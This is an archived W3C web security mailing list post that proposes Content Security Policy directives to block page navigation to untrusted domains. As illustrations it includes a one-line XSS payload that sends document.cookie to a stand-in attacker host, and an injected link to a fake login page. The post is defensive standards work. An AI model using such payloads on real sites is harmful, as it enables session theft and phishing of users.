W3C home > Mailing lists > Public > public-webappsec@w3.org > April 2015

[CSP2] Preventing page navigation to untrusted sources

From: David Mulder <david.mulder@ymail.com>
Date: Mon, 27 Apr 2015 23:57:00 +0200
Message-ID: <CAOAJK9hx1uPcK4kC6vpqBi5+s_k3oxSj-1-Dq42ikd8Dpy0hLw@mail.gmail.com>
To: public-webappsec@w3.org
Given that an attacker has found a way to execute Javascript through an XSS
injection `connect-src` could be a valuable tool to prevent data from being
leaked. The problem however is that it is not possible to prevent page
navigation like for example

    *location.href = "http://evildomain.com
<http://evildomain.com>?"+document.cookie;*

It would be incredibly valuable if a website owner could limit to which
pages his pages are allowed to link or direct in any way.

This would also be valuable to prevent phishing through XSS injection where
one would inject a stylized link trying to lure the user to a different
domain along the lines of for example

    *<a href="http://evildomain.com/fakeLoginForm.html
<http://evildomain.com/fakeLoginForm.html>" style="background:red;">Click
here to authorize your account against hackers</a>*

And lastly it would make CSP an *incredibly* valuable tool for sandboxing
as well. Say one is running a webmail service this would allow arbitrary
script execution without the risk of data being leaked unexpectedly or the
user being unexpectedly redirected.

---

What I am proposing is a directive that limits any and all linking

    *link-src: my-safe-domain.com <http://my-safe-domain.com>*

And separately a directive that limits all script based redirection
attempts (which would need to for example also include dispatching a click
event on `<a>`-tags)

    *script-link-src: my-safe-domain.com <http://my-safe-domain.com>*

The reason two different directives would be required is that during
sandboxing (e.g. a webmail client) one may allow links to any domains, yet
wish to prevent the browser from automatically redirecting to *evildomain.com
<http://evildomain.com>*. I am inclined to say that any
`link-src` directives would need to be enforced for `script-link-src` as
well, as I can not think of any situation where a script would be allowed
to link to a domain where an anchor tag may not and it would prevent stupid
mistakes where enforcement of `script-link-src` is forgotten.

---

I have searched through the archives whether such a directive has been
proposed in the past and I was not able to find anything and really hope
you guys can see the value of such a directive.

 Greetings,
  David Mulder
Received on Tuesday, 28 April 2015 08:24:35 UTC

This archive was generated by hypermail 2.3.1 : Monday, 23 October 2017 14:54:12 UTC